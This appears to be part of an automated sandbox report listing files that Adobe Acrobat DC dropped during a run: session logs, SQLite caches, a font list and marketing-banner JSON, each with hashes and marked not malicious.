                              Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):319
                              Entropy (8bit):5.1752915567851625
                              Encrypted:false
                              SSDEEP:
                              MD5:7F1592E52B859A3D339DB04CB17AF65A
                              SHA1:35191047AE02B9FDEB707EBFA43DFA13BDA74509
                              SHA-256:C9B534ABC9394624E28760152C56D7E055F8006E3A14056045227D2E72485275
                              SHA-512:5A0C784F87825BA0A8F472B8F28152C366AEBC1A8A43061A97D7B3E72DBDBB945114DBA6A36FC8DA3B3A0131976B03E44B5BD0A62C64A1146B7261CCD2DCD68E
                              Malicious:false
                              Reputation:unknown
                              Preview:2024/04/25-15:16:02.349 b44 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/04/25-15:16:02.350 b44 Recovering log #3.2024/04/25-15:16:02.352 b44 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                              Category:dropped
                              Size (bytes):71190
                              Entropy (8bit):0.424711652637865
                              Encrypted:false
                              SSDEEP:
                              MD5:75E0B57738FE96C69E181E7091CE5399
                              SHA1:92C53888B5E11915E9F17617059CE725280F15B8
                              SHA-256:36DE2F1629008CC88CFC5F7ADD8DBE864D30F9324223F237CF16BE4944EDB076
                              SHA-512:32C525D7DEE8C216FBA30629CFD889C4D2BF2E7193C3B480C29A7F7DFCDA564E1A89D9B03A175698E0DEED601D13B29C5243AA67524643FAA990433E100733AE
                              Malicious:false
                              Reputation:unknown
                              Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                              Category:dropped
                              Size (bytes):57344
                              Entropy (8bit):3.291927920232006
                              Encrypted:false
                              SSDEEP:
                              MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                              SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                              SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                              SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                              Malicious:false
                              Reputation:unknown
                              Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:SQLite Rollback Journal
                              Category:dropped
                              Size (bytes):16928
                              Entropy (8bit):1.2158158926011557
                              Encrypted:false
                              SSDEEP:
                              MD5:14394641685766FBE069EFFE69C62910
                              SHA1:E833A0F07EC705EE8AA8A4BCC4774C236D84C37F
                              SHA-256:F31FFCCC149BECF3F84BD4A082E7B45C9BA224168255DA4EB77319A57CD8350A
                              SHA-512:9326DBD1A894C57BE5787A667BD7DEF5F0D189CB31B7C87B206B11CFB3B2251DD32374EEA8A61AABC6B7BD380B526907DC89C31BBAA3EBB91F7A0A0F840E3376
                              Malicious:false
                              Reputation:unknown
                              Preview:.... .c.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:PostScript document text
                              Category:dropped
                              Size (bytes):185099
                              Entropy (8bit):5.182478651346149
                              Encrypted:false
                              SSDEEP:
                              MD5:94185C5850C26B3C6FC24ABC385CDA58
                              SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                              SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                              SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                              Malicious:false
                              Reputation:unknown
                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:PostScript document text
                              Category:dropped
                              Size (bytes):0
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:
                              MD5:94185C5850C26B3C6FC24ABC385CDA58
                              SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                              SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                              SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                              Malicious:false
                              Reputation:unknown
                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):295
                              Entropy (8bit):5.3905495817176
                              Encrypted:false
                              SSDEEP:
                              MD5:3B22A7B53F2F0EF3F85C71C670FAE45C
                              SHA1:D949A337C489441BA573E9890CB1B2216D85412D
                              SHA-256:018F8107D244C59ECA951B723E96E22ADDA94DB17EF26F202EEF548CFDDFB342
                              SHA-512:8AD3AF7503175997511155DB797E502FC481E63D284BF92482BDC4309BBA3E7B77CFFE084A149CEB11A83F54F9B142315689173379ACD510AB564181CC0DBFF3
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):294
                              Entropy (8bit):5.340250533736306
                              Encrypted:false
                              SSDEEP:
                              MD5:57D5ECADBF01BDBF39B773711C602B11
                              SHA1:5BB0E134A706879A309F3827C1B291BF16713E0E
                              SHA-256:E648A3BE17E568A3429832D792810AD3DE38FFC3EF0361870F9835EA6AE76DD0
                              SHA-512:E369FC0A9F5D918A72CF7C72B9521AC7C9EB86B62980DBDA0E769DB1799A4583F116988F5BD230BE4BCE1BDC6BE7E10830015DA1A6A849E7DD273475BC1F2D6E
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):294
                              Entropy (8bit):5.31944828170551
                              Encrypted:false
                              SSDEEP:
                              MD5:3169775E746494549C4709DB01A56CE6
                              SHA1:DA84C57807E866F2C5964AD9894E58E40C67C179
                              SHA-256:9CD4ED0F93EECB3D0FC40A8487064B0C4342F9488DB9E50A2DEA260F9F0080AD
                              SHA-512:AEE16E944862035969DBA77C5B1016B37F2BE216D13F304FEAC68381A7CB4124FAC6C573C7D111E7F4CECE24FC4AF259F311F1DBB17E1F68A78B8C77F27A3075
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):285
                              Entropy (8bit):5.379883672051592
                              Encrypted:false
                              SSDEEP:
                              MD5:F2338B4F5E14787E2FF70A04821F67F2
                              SHA1:22AEADD96A8CB7E989C0C0624FA80D726FBB9059
                              SHA-256:1F7E4EE83D0D9D5648C8D78F428DD3E023146D1328BC9715385927D54792106D
                              SHA-512:A86009A4E914AD9792D3339805F73A39B2B63CA3A9E2AEA6B93483198C4FF48218D4E33E7A9B3F5EE67E32D9694D2F84F5E0C7A23DB09729DB574A343869A9DE
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):292
                              Entropy (8bit):5.3448247719669855
                              Encrypted:false
                              SSDEEP:
                              MD5:3C2A4D44DE49857E96B2105F3F3F999F
                              SHA1:811388BEFFFBA182C1B171451CEFAD9C627DD7C8
                              SHA-256:274A73BD677692747862B3C28AD735B839EA220E209CCADADD666A7373B48942
                              SHA-512:BEB42CC6BAA7DA277205476C2EC4DAF314C915A4E41CEDBE414A084B6C9DC8EDAA153AC27BE1C34432C7B4A870A62673938580179241E75BF507B0C5A0C07AC1
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):289
                              Entropy (8bit):5.332834735137726
                              Encrypted:false
                              SSDEEP:
                              MD5:B10C839344871DC1771626B52DFCBF84
                              SHA1:B277ED4151CBB2F77F3571A365F55289AA1912B3
                              SHA-256:D8976CE2AF40321FD0409CD5EFB56370160C01DA83092AA3CF209A228BCCA384
                              SHA-512:34D3466D263B6D6D6D83AC2BCC16D1F93A24C99F1CFE831BB4DED6CA336CBE7E92C15E620BCD50249FCB5EE41A98E0BC04AB9AA381D0619BE1E3A28D3E94C5A4
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):292
                              Entropy (8bit):5.334801819274057
                              Encrypted:false
                              SSDEEP:
                              MD5:4C243847CD2013B5402D6EADD1719C55
                              SHA1:94466FE0E94D7AB688535A79A7D04EC3B6D5F288
                              SHA-256:F71614CFFC4C669A12BDE9A7012B06D7BADB6E20A849E1C19480084A54645A3B
                              SHA-512:70A6019769611F93AFF72FCCCDD996C71C039AEF5AB70CC6BE94303895EB6F8BE7365E2D7353D62497941BE21D01462BD95CFB99E1D6FB86885CFE591EFE5845
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):289
                              Entropy (8bit):5.343348477288208
                              Encrypted:false
                              SSDEEP:
                              MD5:0072029C0E1AEBADFA78FA3CB13E8D61
                              SHA1:4437EFABEBAF7E2A281502B08C246B10537C37D1
                              SHA-256:82C2B933E458DF7A3C77C92EF35E456E7952869562A8BC9EF9CC4BD8393B2BFC
                              SHA-512:3AD705750240D018E0102710572FB224EBC6BBF20B9B15F07C68AFF53C147678AAD9F92DA6F5307562C57BF991FB13138452631C6F17E4D54C1A767CA6E436B5
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):1372
                              Entropy (8bit):5.744478402490294
                              Encrypted:false
                              SSDEEP:
                              MD5:2CFFFBCBC940FC21CEDD17434A49346E
                              SHA1:0CE4E6C77F84EA433A2401F1E8410D4092547996
                              SHA-256:17DED9D67739B114AB1F4777B52C278999D02993B82B14F068ED1750E152F18F
                              SHA-512:FECDEF5F162EB0DAD4D3882C5CB9FD7E4C29817E0D9FA0C3344093B6DCA13F04937176E4B443F2BB198453B3B5F031B927F26B0FC871CA0A2A1BDD666FE39E98
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"79887_247329ActionBlock_0","campaignId":79887,"containerId":"1","controlGroupId":"","treatmentId":"acc56846-d570-4500-a26e-7f8cf2b4acad","variationId":"247329"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNSIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTMiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBwcmVtaXVtIFBERiBhbmQgZS1zaWduaW5nIHRvb2xzLiIsImJ
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):289
                              Entropy (8bit):5.338363379957251
                              Encrypted:false
                              SSDEEP:
                              MD5:60B23080DDDA92B1E8AFD74478AE4591
                              SHA1:A4D01EC1EF2CAFEBF8F4FBD13F70AED1B4C4D730
                              SHA-256:5FF5F5094D30840A143B3073C6CE2E6D81BD7C35E7BEE022AC1C24BEA01DA9BE
                              SHA-512:F6889295FC9153DEB0DFF708B98458405B00CC1029954A7FD68A51CFFA44DF0B15AEF25A4A486BAEB66DFC16D6F2239D2BE012048B5487FBCEF3484FF5F5A66A
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):1395
                              Entropy (8bit):5.779346202677281
                              Encrypted:false
                              SSDEEP:
                              MD5:F251A60A10BF0969AE7662C5A7B3BBFE
                              SHA1:6246EEF90E3917098CC4ABB7759EA55AD27B4B13
                              SHA-256:5ACC7524EE5C19611183D510BE0419A24C22ED74679F49ECA54C80B80F8EA442
                              SHA-512:A95B03CB7082347BF31C4A518F62D7BDDB21AAC427DFF5DF144718BA167CF0EBE30B228984D8A3203346BBB7FE3FB486F6E73232904EF4585EE4D51466C31C17
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):291
                              Entropy (8bit):5.321646811789484
                              Encrypted:false
                              SSDEEP:
                              MD5:851C094DD9B7FA66039D57B6E61444C8
                              SHA1:02245BE199228D5F16A1BFE5EB8C87421C93E667
                              SHA-256:6790226FFAB48CD18C9BA0A96DEC82C57229062A97F1A05855313DC69F30B28A
                              SHA-512:7E506EEAEA612A705866A6A6F7AE0AC243DC3CE6819584F7CFC2156F915F8A14E794891C5097B6545278551268E1F06E436DB8D879EAED07E75D88E25B0A698E
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):287
                              Entropy (8bit):5.324909388481207
                              Encrypted:false
                              SSDEEP:
                              MD5:D1F545BAA73F3F95C11CA85518757485
                              SHA1:28D5E98F28DC5648EBAE676DD83D27C338A3B6B3
                              SHA-256:886AE037855E8701B71469FB5FC0F4184C697914AC41E75B5021696EF1DF883B
                              SHA-512:81C999E4D1169AF3309A9D93F78B3EACF58B70EB1F164BA9A283F0ADB097E6C0C2EA16C051E0ABC444B5939A478A4EE2AD2D391B352D57FA8C1BF954F639BC8D
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):289
                              Entropy (8bit):5.344904690641176
                              Encrypted:false
                              SSDEEP:
                              MD5:2909C51D785A87D2124FD15E888B9037
                              SHA1:30EEDE149119A6AD08FD8B8559CA48DA77A0C80E
                              SHA-256:5B19D90326A0A1C544B540D960D48696CF9C67D8AC49BD35F7DE62F3A816C31B
                              SHA-512:876A68A8A5DFB1C188F85948C9DF98BCD7008C8A46337799336047574DAAE2B6C556633B8C6F466025F39F8E5B473ADFC80E6D3BF19D8732FFDFFC16465034F5
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):286
                              Entropy (8bit):5.303324502722952
                              Encrypted:false
                              SSDEEP:
                              MD5:281C78B304A685E5918AFC111202862B
                              SHA1:71538D44D6685902BB51A20DAB7459556F20ACA3
                              SHA-256:FCD0266923A0AE69FCCEDE05A1DD22A9A5DA64971C0A768363D7A28D2460168E
                              SHA-512:E01544046B884F129439251446DBBA82A7E0240F6B4C20FC1D00DDD997F0D3049157051BFD9290DF283A852A75D231585DC881D5E9312C142F6B9120D1A750B8
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):782
                              Entropy (8bit):5.378070000248451
                              Encrypted:false
                              SSDEEP:
                              MD5:BF810692E446C12582DDE0FB49F1DFC6
                              SHA1:145BCA884104D072BF93D95CF2D06E06CA7BA5FF
                              SHA-256:CBB4056A39A8B8FDF10359D50EFF0A3B2044C053D007E51065A5429299E2F122
                              SHA-512:DE05C514BF5CA071F25A5AFBD7AC6FCE4B43BE0BAAF0FEC7F2BF86E6616F2E9F8891873BEAC9CD499C085A1417CF3DD2658DBE7F43844C5F945D4DE245E62EE3
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"10f82fb1-b082-429f-99e9-576273227162","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1714225371685,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1714050966718}}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4
                              Entropy (8bit):0.8112781244591328
                              Encrypted:false
                              SSDEEP:
                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                              Malicious:false
                              Reputation:unknown
                              Preview:....
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):2814
                              Entropy (8bit):5.128010487782213
                              Encrypted:false
                              SSDEEP:
                              MD5:A70C92F869FE4B9D27E9FC71E58FB059
                              SHA1:EDEF8E00A71DE0F7612340F1EAAF8976B2480A54
                              SHA-256:EDCAD5551935E6C577818933A9AAFB3FB3D756B66C818AD8263A49CAE15B25F7
                              SHA-512:2087F16D9C90FD061D7DF5B2CAC6E64E26136D8054A1B7EB8A2074A266A878AD6AE8CEFE2618E82BCB595D61C51845803F1CB4B7BF18A2E6A2F8BB4B7557E8BD
                              Malicious:false
                              Reputation:unknown
